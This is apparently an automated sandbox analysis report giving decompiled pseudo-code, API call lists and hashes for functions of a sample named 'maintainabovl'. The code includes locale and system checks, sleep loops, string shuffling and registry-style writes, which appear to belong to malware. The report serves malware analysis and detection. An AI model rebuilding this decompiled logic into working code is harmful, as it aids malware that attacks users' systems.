                                                    • Opcode ID: 847274582f8964afd5ee92a5191dbdf3b56bd8f70615b6f98c00c277a2efc661
                                                    • Instruction ID: 1a5d882b6dc3ffe01724be00b0c15ad942636833b60c9522095c85bd1cf5ce38
                                                    • Opcode Fuzzy Hash: 847274582f8964afd5ee92a5191dbdf3b56bd8f70615b6f98c00c277a2efc661
                                                    • Instruction Fuzzy Hash: E4F0DA70300251DFEF309B69DD68B1A3BF4BB58344B048444B9D1D7269C666D851EB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 59%
                                                    			E01091C88(signed int __edx) {
                                                    				signed int _v8;
                                                    				long _v12;
                                                    				CHAR* _v16;
                                                    				long _v20;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* _t21;
                                                    				CHAR* _t22;
                                                    				CHAR* _t25;
                                                    				intOrPtr _t26;
                                                    				void* _t27;
                                                    				void* _t31;
                                                    				intOrPtr _t32;
                                                    				void* _t33;
                                                    				CHAR* _t37;
                                                    				CHAR* _t43;
                                                    				CHAR* _t44;
                                                    				CHAR* _t45;
                                                    				void* _t50;
                                                    				void* _t52;
                                                    				signed char _t57;
                                                    				intOrPtr _t59;
                                                    				signed int _t60;
                                                    				void* _t64;
                                                    				CHAR* _t68;
                                                    				CHAR* _t69;
                                                    				char* _t70;
                                                    				void* _t71;
                                                    
                                                    				_t62 = __edx;
                                                    				_v20 = 0;
                                                    				_v8 = 0;
                                                    				_v12 = 0;
                                                    				_t21 = E01095D37();
                                                    				if(_t21 != 0) {
                                                    					_t60 =  *0x109a2fc; // 0x2000000a
                                                    					_t56 = (_t60 & 0xf0000000) + _t21;
                                                    					 *0x109a2fc = (_t60 & 0xf0000000) + _t21;
                                                    				}
                                                    				_t22 =  *0x109a178(0, 2); // executed
                                                    				_v16 = _t22;
                                                    				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                    					_t25 = E010929E6( &_v8,  &_v20); // executed
                                                    					_t55 = _t25;
                                                    					_t26 =  *0x109a348; // 0xa6d5a8
                                                    					if( *0x109a2fc > 5) {
                                                    						_t8 = _t26 + 0x109b5c5; // 0x4d283a53
                                                    						_t27 = _t8;
                                                    					} else {
                                                    						_t7 = _t26 + 0x109b9ef; // 0x44283a44
                                                    						_t27 = _t7;
                                                    					}
                                                    					E01096234(_t27, _t27);
                                                    					_t31 = E010974C4(_t62,  &_v20,  &_v12); // executed
                                                    					if(_t31 == 0) {
                                                    						CloseHandle(_v20);
                                                    					}
                                                    					_t64 = 5;
                                                    					if(_t55 != _t64) {
                                                    						_t32 = E01093BEF();
                                                    						 *0x109a310 =  *0x109a310 ^ 0x81bbe65d;
                                                    						 *0x109a36c = _t32;
                                                    						_t33 = E01096A51(0x60);
                                                    						 *0x109a3cc = _t33;
                                                    						__eflags = _t33;
                                                    						if(_t33 == 0) {
                                                    							_push(8);
                                                    							_pop(0);
                                                    						} else {
                                                    							memset(_t33, 0, 0x60);
                                                    							_t50 =  *0x109a3cc; // 0x1b09600
                                                    							_t71 = _t71 + 0xc;
                                                    							__imp__(_t50 + 0x40);
                                                    							_t52 =  *0x109a3cc; // 0x1b09600
                                                    							 *_t52 = 0x109b827;
                                                    						}
                                                    						_t55 = 0;
                                                    						__eflags = 0;
                                                    						if(0 == 0) {
                                                    							_t37 = RtlAllocateHeap( *0x109a2d8, 0, 0x43);
                                                    							 *0x109a368 = _t37;
                                                    							__eflags = _t37;
                                                    							if(_t37 == 0) {
                                                    								_push(8);
                                                    								_pop(0);
                                                    							} else {
                                                    								_t57 =  *0x109a2fc; // 0x2000000a
                                                    								_t62 = _t57 & 0x000000ff;
                                                    								_t59 =  *0x109a348; // 0xa6d5a8
                                                    								_t13 = _t59 + 0x109b552; // 0x697a6f4d
                                                    								_t56 = _t13;
                                                    								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x109927b);
                                                    							}
                                                    							_t55 = 0;
                                                    							__eflags = 0;
                                                    							if(0 == 0) {
                                                    								asm("sbb eax, eax");
                                                    								E01095710( ~_v8 &  *0x109a310, 0x109a00c); // executed
                                                    								_t43 = E01097596(0, _t56, _t62, _t64, 0x109a00c); // executed
                                                    								_t55 = _t43;
                                                    								__eflags = _t55;
                                                    								if(_t55 != 0) {
                                                    									goto L30;
                                                    								}
                                                    								_t44 = E01091603(_t62); // executed
                                                    								__eflags = _t44;
                                                    								if(_t44 != 0) {
                                                    									__eflags = _v8;
                                                    									_t68 = _v12;
                                                    									if(_v8 != 0) {
                                                    										L29:
                                                    										_t45 = E010948D3(_t62, _t68, _v8); // executed
                                                    										_t55 = _t45;
                                                    										goto L30;
                                                    									}
                                                    									__eflags = _t68;
                                                    									if(__eflags == 0) {
                                                    										goto L30;
                                                    									}
                                                    									_t55 = E010934AD(__eflags,  &(_t68[4]));
                                                    									__eflags = _t55;
                                                    									if(_t55 == 0) {
                                                    										goto L30;
                                                    									}
                                                    									goto L29;
                                                    								}
                                                    								_t55 = 8;
                                                    							}
                                                    						}
                                                    					} else {
                                                    						_t69 = _v12;
                                                    						if(_t69 == 0) {
                                                    							L30:
                                                    							if(_v16 == 0 || _v16 == 1) {
                                                    								 *0x109a17c();
                                                    							}
                                                    							goto L34;
                                                    						}
                                                    						_t70 =  &(_t69[4]);
                                                    						do {
                                                    						} while (E01095F7C(_t64, _t70, 0, 1) == 0x4c7);
                                                    					}
                                                    					goto L30;
                                                    				} else {
                                                    					_t55 = _t22;
                                                    					L34:
                                                    					return _t55;
                                                    				}
                                                    			}

                                                    [Address column for the C-code above: one instruction address per decompiled line, 0x01091c88 through 0x01091e6c in the function's code order; 0x00000000 entries are lines the decompiler synthesized (goto/break) that have no instruction of their own.]

                                                    APIs
                                                      • Part of subcall function 01095D37: GetModuleHandleA.KERNEL32(4C44544E,00000000,01091CA0,00000001), ref: 01095D46
                                                    • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 01091D1D
                                                      • Part of subcall function 01093BEF: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 01093C13
                                                      • Part of subcall function 01093BEF: wsprintfA.USER32 ref: 01093C77
                                                      • Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D
                                                    • memset.NTDLL ref: 01091D77
                                                    • RtlInitializeCriticalSection.NTDLL(01B095C0), ref: 01091D88
                                                      • Part of subcall function 010934AD: memset.NTDLL ref: 010934C7
                                                      • Part of subcall function 010934AD: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 0109350D
                                                      • Part of subcall function 010934AD: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 01093518
                                                    • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 01091DB3
                                                    • wsprintfA.USER32 ref: 01091DE3
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
                                                    • String ID:
                                                    • API String ID: 1825273115-0
                                                    • Opcode ID: 4f6ee680d363ce02e7289b62975aabbb2611ae4c26cac7c17ee255b17e76a40d
                                                    • Instruction ID: 5c81b1203a37da65ee925dd217742a7fe5157dedde9ce037dcfa51113a9cd6e0
                                                    • Opcode Fuzzy Hash: 4f6ee680d363ce02e7289b62975aabbb2611ae4c26cac7c17ee255b17e76a40d
                                                    • Instruction Fuzzy Hash: F2511771B01216EFDF61ABA8DC74FAE37E8BB08B64F0044A5F5C1E7144D7769940AB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 22%
                                                    			E0109256D(signed int __eax, signed int _a4, signed int _a8) {
                                                    				signed int _v8;
                                                    				signed int _v12;
                                                    				intOrPtr _v16;
                                                    				signed int _v20;
                                                    				intOrPtr _t81;
                                                    				char _t83;
                                                    				signed int _t90;
                                                    				signed int _t97;
                                                    				signed int _t99;
                                                    				char _t101;
                                                    				unsigned int _t102;
                                                    				intOrPtr _t103;
                                                    				char* _t107;
                                                    				signed int _t110;
                                                    				signed int _t113;
                                                    				signed int _t118;
                                                    				signed int _t122;
                                                    				intOrPtr _t124;
                                                    
                                                    				_t102 = _a8;
                                                    				_t118 = 0;
                                                    				_v20 = __eax;
                                                    				_t122 = (_t102 >> 2) + 1;
                                                    				_v8 = 0;
                                                    				_a8 = 0;
                                                    				_t81 = E01096A51(_t122 << 2);
                                                    				_v16 = _t81;
                                                    				if(_t81 == 0) {
                                                    					_push(8);
                                                    					_pop(0);
                                                    					L37:
                                                    					return 0;
                                                    				}
                                                    				_t107 = _a4;
                                                    				_a4 = _t102;
                                                    				_t113 = 0;
                                                    				while(1) {
                                                    					_t83 =  *_t107;
                                                    					if(_t83 == 0) {
                                                    						break;
                                                    					}
                                                    					if(_t83 == 0xd || _t83 == 0xa) {
                                                    						if(_t118 != 0) {
                                                    							if(_t118 > _v8) {
                                                    								_v8 = _t118;
                                                    							}
                                                    							_a8 = _a8 + 1;
                                                    							_t118 = 0;
                                                    						}
                                                    						 *_t107 = 0;
                                                    						goto L16;
                                                    					} else {
                                                    						if(_t118 != 0) {
                                                    							L10:
                                                    							_t118 = _t118 + 1;
                                                    							L16:
                                                    							_t107 = _t107 + 1;
                                                    							_t15 =  &_a4;
                                                    							 *_t15 = _a4 - 1;
                                                    							if( *_t15 != 0) {
                                                    								continue;
                                                    							}
                                                    							break;
                                                    						}
                                                    						if(_t113 == _t122) {
                                                    							L21:
                                                    							if(_a8 <= 0x20) {
                                                    								_push(0xb);
                                                    								L34:
                                                    								_pop(0);
                                                    								L35:
                                                    								E0109692B(_v16);
                                                    								goto L37;
                                                    							}
                                                    							_t24 = _v8 + 5; // 0xcdd8d2f8
                                                    							_t103 = E01096A51((_v8 + _t24) * _a8 + 4);
                                                    							if(_t103 == 0) {
                                                    								_push(8);
                                                    								goto L34;
                                                    							}
                                                    							_t90 = _a8;
                                                    							_a4 = _a4 & 0x00000000;
                                                    							_v8 = _v8 & 0x00000000;
                                                    							_t124 = _t103 + _t90 * 4;
                                                    							if(_t90 <= 0) {
                                                    								L31:
                                                    								 *0x109a318 = _t103;
                                                    								goto L35;
                                                    							}
                                                    							do {
                                                    								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                    								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                    								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                    								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                    								_v12 = _v12 & 0x00000000;
                                                    								if(_a4 <= 0) {
                                                    									goto L30;
                                                    								} else {
                                                    									goto L26;
                                                    								}
                                                    								while(1) {
                                                    									L26:
                                                    									_t99 = _v12;
                                                    									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                                    									if(_t99 == 0) {
                                                    										break;
                                                    									}
                                                    									_v12 = _v12 + 1;
                                                    									if(_v12 < _a4) {
                                                    										continue;
                                                    									}
                                                    									goto L30;
                                                    								}
                                                    								_v8 = _v8 - 1;
                                                    								L30:
                                                    								_t97 = _a4;
                                                    								_a4 = _a4 + 1;
                                                    								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                    								__imp__(_t124);
                                                    								_v8 = _v8 + 1;
                                                    								_t124 = _t124 + _t97 + 1;
                                                    							} while (_v8 < _a8);
                                                    							goto L31;
                                                    						}
                                                    						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                    						_t101 = _t83;
                                                    						if(_t83 - 0x61 <= 0x19) {
                                                    							_t101 = _t101 - 0x20;
                                                    						}
                                                    						 *_t107 = _t101;
                                                    						_t113 = _t113 + 1;
                                                    						goto L10;
                                                    					}
                                                    				}
                                                    				if(_t118 != 0) {
                                                    					if(_t118 > _v8) {
                                                    						_v8 = _t118;
                                                    					}
                                                    					_a8 = _a8 + 1;
                                                    				}
                                                    				goto L21;
                                                    			}

                                                    [Address column for the C-code above: one instruction address per decompiled line, 0x01092574 through 0x010926f7 in the function's code order; 0x00000000 entries are lines the decompiler synthesized (goto/break/continue) that have no instruction of their own.]

                                                    APIs
                                                      • Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D
                                                    • lstrcpy.KERNEL32(69B25F45,00000020), ref: 0109266A
                                                    • lstrcat.KERNEL32(69B25F45,00000020), ref: 0109267F
                                                    • lstrcmp.KERNEL32(00000000,69B25F45), ref: 01092696
                                                    • lstrlen.KERNEL32(69B25F45), ref: 010926BA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                    • String ID:
                                                    • API String ID: 3214092121-3916222277
                                                    • Opcode ID: 26de16b6f27658f1aee9fc357cb06e570c1bd8282f5122db723b0babdb8285e6
                                                    • Instruction ID: b8f88e06ce88333b0299898a2a189216a46e37d0997b58d6d06052a97729fa28
                                                    • Opcode Fuzzy Hash: 26de16b6f27658f1aee9fc357cb06e570c1bd8282f5122db723b0babdb8285e6
                                                    • Instruction Fuzzy Hash: CC51B131A00108FFDF21DF99C8A46EDBBF5FF49314F05809AE995AB241C771AA51EB80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			_entry_() {
                                                    				void* _t1;
                                                    				int _t4;
                                                    				int _t6;
                                                    
                                                    				_t6 = 0;
                                                    				_t1 = HeapCreate(0, 0x400000, 0); // executed
                                                    				 *0x403160 = _t1;
                                                    				if(_t1 != 0) {
                                                    					 *0x403170 = GetModuleHandleA(0);
                                                    					GetCommandLineW(); // executed
                                                    					_t4 = E00401178(); // executed
                                                    					_t6 = _t4;
                                                    					HeapDestroy( *0x403160);
                                                    				}
                                                    				ExitProcess(_t6);
                                                    			}
                                                    0x0040182a
                                                    0x00401833
                                                    0x00401839
                                                    0x00401840
                                                    0x00401849
                                                    0x0040184e
                                                    0x00401854
                                                    0x0040185f
                                                    0x00401861
                                                    0x00401861
                                                    0x00401868

                                                    APIs
                                                    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401833
                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00401843
                                                    • GetCommandLineW.KERNEL32 ref: 0040184E
                                                      • Part of subcall function 00401178: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 004011AD
                                                      • Part of subcall function 00401178: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 004011F4
                                                      • Part of subcall function 00401178: GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 0040121C
                                                      • Part of subcall function 00401178: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401226
                                                      • Part of subcall function 00401178: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401239
                                                      • Part of subcall function 00401178: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401266
                                                      • Part of subcall function 00401178: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401284
                                                    • HeapDestroy.KERNEL32 ref: 00401861
                                                    • ExitProcess.KERNEL32 ref: 00401868
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
                                                    • String ID:
                                                    • API String ID: 1863574965-0
                                                    • Opcode ID: 64a48826a41c1596630c885b0238fc87710a69f0ec3cf485d9d59366367dae9c
                                                    • Instruction ID: 46ce5939423956044b99e745de0fc61d882277726fdf66c6e89cd4a99d514704
                                                    • Opcode Fuzzy Hash: 64a48826a41c1596630c885b0238fc87710a69f0ec3cf485d9d59366367dae9c
                                                    • Instruction Fuzzy Hash: 2BE0B6714027209BC3112F71AF0CA5F3E28BB0E7567048536F605F62B1CB780A01CA9C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E01095E69(void* __edx) {
                                                    				void* _v8;
                                                    				int _v12;
                                                    				WCHAR* _v16;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* _t23;
                                                    				intOrPtr _t24;
                                                    				void* _t26;
                                                    				intOrPtr _t32;
                                                    				intOrPtr _t35;
                                                    				void* _t37;
                                                    				intOrPtr _t38;
                                                    				intOrPtr _t42;
                                                    				void* _t45;
                                                    				void* _t50;
                                                    				void* _t52;
                                                    
                                                    				_t50 = __edx;
                                                    				_v12 = 0;
                                                    				_t23 = E0109181A(0,  &_v8); // executed
                                                    				if(_t23 != 0) {
                                                    					_v8 = 0;
                                                    				}
                                                    				_t24 =  *0x109a348; // 0xa6d5a8
                                                    				_t4 = _t24 + 0x109be30; // 0x1b093d8
                                                    				_t5 = _t24 + 0x109bdd8; // 0x4f0053
                                                    				_t26 = E01096A66( &_v16, _v8, _t5, _t4); // executed
                                                    				_t45 = _t26;
                                                    				if(_t45 == 0) {
                                                    					StrToIntExW(_v16, 0,  &_v12);
                                                    					_t45 = 8;
                                                    					if(_v12 < _t45) {
                                                    						_t45 = 1;
                                                    						__eflags = 1;
                                                    					} else {
                                                    						_t32 =  *0x109a348; // 0xa6d5a8
                                                    						_t11 = _t32 + 0x109be24; // 0x1b093cc
                                                    						_t48 = _t11;
                                                    						_t12 = _t32 + 0x109bdd8; // 0x4f0053
                                                    						_t52 = E01091E85(_t11, _t12, _t11);
                                                    						_t59 = _t52;
                                                    						if(_t52 != 0) {
                                                    							_t35 =  *0x109a348; // 0xa6d5a8
                                                    							_t13 = _t35 + 0x109be6e; // 0x30314549
                                                    							_t37 = E0109136E(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                                                    							if(_t37 == 0) {
                                                    								_t61 =  *0x109a2fc - 6;
                                                    								if( *0x109a2fc <= 6) {
                                                    									_t42 =  *0x109a348; // 0xa6d5a8
                                                    									_t15 = _t42 + 0x109bdba; // 0x52384549
                                                    									E0109136E(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                    								}
                                                    							}
                                                    							_t38 =  *0x109a348; // 0xa6d5a8
                                                    							_t17 = _t38 + 0x109be68; // 0x1b09410
                                                    							_t18 = _t38 + 0x109be40; // 0x680043
                                                    							_t45 = E010951C0(_v8, 0x80000001, _t52, _t18, _t17);
                                                    							HeapFree( *0x109a2d8, 0, _t52);
                                                    						}
                                                    					}
                                                    					HeapFree( *0x109a2d8, 0, _v16);
                                                    				}
                                                    				_t54 = _v8;
                                                    				if(_v8 != 0) {
                                                    					E0109739F(_t54);
                                                    				}
                                                    				return _t45;
                                                    			}
                                                    0x01095e69
                                                    0x01095e79
                                                    0x01095e7c
                                                    0x01095e83
                                                    0x01095e85
                                                    0x01095e85
                                                    0x01095e88
                                                    0x01095e8d
                                                    0x01095e94
                                                    0x01095ea1
                                                    0x01095ea6
                                                    0x01095eaa
                                                    0x01095eb8
                                                    0x01095ec6
                                                    0x01095eca
                                                    0x01095f5b
                                                    0x01095f5b
                                                    0x01095ed0
                                                    0x01095ed0
                                                    0x01095ed5
                                                    0x01095ed5
                                                    0x01095edc
                                                    0x01095ee8
                                                    0x01095eea
                                                    0x01095eec
                                                    0x01095eee
                                                    0x01095ef5
                                                    0x01095f00
                                                    0x01095f07
                                                    0x01095f09
                                                    0x01095f10
                                                    0x01095f12
                                                    0x01095f19
                                                    0x01095f24
                                                    0x01095f24
                                                    0x01095f10
                                                    0x01095f29
                                                    0x01095f2e
                                                    0x01095f35
                                                    0x01095f53
                                                    0x01095f55
                                                    0x01095f55
                                                    0x01095eec
                                                    0x01095f67
                                                    0x01095f67
                                                    0x01095f69
                                                    0x01095f6e
                                                    0x01095f70
                                                    0x01095f70
                                                    0x01095f7b

                                                    APIs
                                                    • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,01B093D8,00000000,?,7476F710,00000000,7476F730), ref: 01095EB8
                                                    • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,01B09410,?,00000000,30314549,00000014,004F0053,01B093CC), ref: 01095F55
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,01094974), ref: 01095F67
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: Uqt
                                                    • API String ID: 3298025750-2320327147
                                                    • Opcode ID: db5e330acf881293e12a75c13e5574e4eb1378da1ccd265a7a8ae7b67cafaac2
                                                    • Instruction ID: e2be96719ba0bbb3157a9be28a543a39dc3b17d348292943ab7721aca378a431
                                                    • Opcode Fuzzy Hash: db5e330acf881293e12a75c13e5574e4eb1378da1ccd265a7a8ae7b67cafaac2
                                                    • Instruction Fuzzy Hash: 5A31A432600219FFDF22DF95DDA4EDE7BFCEB48720F0441A6B68497060D6729A48EB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SysAllocString.OLEAUT32(80000002), ref: 01095114
                                                    • SysAllocString.OLEAUT32(010920DA), ref: 01095158
                                                    • SysFreeString.OLEAUT32(00000000), ref: 0109516C
                                                    • SysFreeString.OLEAUT32(00000000), ref: 0109517A
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: String$AllocFree
                                                    • String ID:
                                                    • API String ID: 344208780-0
                                                    • Opcode ID: 89218a799f46c17b97d6e5d35f2fa5af7cc0fdc0e673d12c92397eed47e7bc26
                                                    • Instruction ID: 60fd22f5f1757e8864107fa905da6b719ca1280ef42e961e5a65d061b3f1f589
                                                    • Opcode Fuzzy Hash: 89218a799f46c17b97d6e5d35f2fa5af7cc0fdc0e673d12c92397eed47e7bc26
                                                    • Instruction Fuzzy Hash: 55312AB2900209EFCF16CF99D8E08EE7BB9FF48350B10852EFA4697250D7759981CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 65%
                                                    			E010928A7(void* __ecx, intOrPtr _a4) {
                                                    				struct _FILETIME _v12;
                                                    				int _t13;
                                                    				signed int _t16;
                                                    				void* _t17;
                                                    				signed int _t18;
                                                    				unsigned int _t22;
                                                    				void* _t30;
                                                    				signed int _t34;
                                                    
                                                    				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                                                    				asm("stosd");
                                                    				do {
                                                    					_t13 = SwitchToThread();
                                                    					GetSystemTimeAsFileTime( &_v12);
                                                    					_t22 = _v12.dwHighDateTime;
                                                    					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                                                    					_push(0);
                                                    					_push(0x13);
                                                    					_push(_t22 >> 5);
                                                    					_push(_t16);
                                                    					L01098376();
                                                    					_t34 = _t16 + _t13;
                                                    					_t17 = E01092F78(_a4, _t34);
                                                    					_t30 = _t17;
                                                    					_t18 = 3;
                                                    					Sleep(_t18 << (_t34 & 0x00000007)); // executed
                                                    				} while (_t30 == 1);
                                                    				return _t30;
                                                    			}
                                                    0x010928ac
                                                    0x010928b7
                                                    0x010928b8
                                                    0x010928b8
                                                    0x010928c4
                                                    0x010928cd
                                                    0x010928d0
                                                    0x010928d4
                                                    0x010928d6
                                                    0x010928db
                                                    0x010928dc
                                                    0x010928dd
                                                    0x010928e7
                                                    0x010928ea
                                                    0x010928f1
                                                    0x010928f5
                                                    0x010928fc
                                                    0x01092902
                                                    0x0109290c

                                                    APIs
                                                    • SwitchToThread.KERNEL32(?,00000001,?,?,?,010910A6,?,?), ref: 010928B8
                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,010910A6,?,?), ref: 010928C4
                                                    • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 010928DD
                                                      • Part of subcall function 01092F78: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 01093017
                                                    • Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,010910A6,?,?), ref: 010928FC
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                                                    • String ID:
                                                    • API String ID: 1610602887-0
                                                    • Opcode ID: e02b6488f5c5f2a5f6f6b07fd591dc1c324001b7755ecd7b73c080f465b98ca9
                                                    • Instruction ID: b3758cd50361cbc6214fa5812d67b5b75b280e2ad419b8ea5db941694eafb391
                                                    • Opcode Fuzzy Hash: e02b6488f5c5f2a5f6f6b07fd591dc1c324001b7755ecd7b73c080f465b98ca9
                                                    • Instruction Fuzzy Hash: D4F0A477A402047BDB149BA4CC2EBDF76B9E7C5361F104128F611E7340E6B89A018790
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0109136E(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                    				struct _FILETIME _v12;
                                                    				void* _t11;
                                                    				void* _t16;
                                                    				short _t19;
                                                    				void* _t22;
                                                    				void* _t24;
                                                    				void* _t25;
                                                    				short* _t26;
                                                    
                                                    				_t24 = __edx;
                                                    				_t25 = E01094881(_t11, _a12);
                                                    				if(_t25 == 0) {
                                                    					_t22 = 8;
                                                    				} else {
                                                    					_t26 = _t25 + _a16 * 2;
                                                    					 *_t26 = 0; // executed
                                                    					_t16 = E0109346E(__ecx, _a4, _a8, _t25); // executed
                                                    					_t22 = _t16;
                                                    					if(_t22 == 0) {
                                                    						GetSystemTimeAsFileTime( &_v12);
                                                    						_t19 = 0x5f;
                                                    						 *_t26 = _t19;
                                                    						_t22 = E010910C5(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
                                                    					}
                                                    					HeapFree( *0x109a2d8, 0, _t25);
                                                    				}
                                                    				return _t22;
                                                    			}
                                                    0x0109136e
                                                    0x0109137f
                                                    0x01091383
                                                    0x010913de
                                                    0x01091385
                                                    0x0109138c
                                                    0x01091394
                                                    0x01091397
                                                    0x0109139c
                                                    0x010913a0
                                                    0x010913a6
                                                    0x010913ae
                                                    0x010913b1
                                                    0x010913c9
                                                    0x010913c9
                                                    0x010913d4
                                                    0x010913d4
                                                    0x010913e5

                                                    APIs
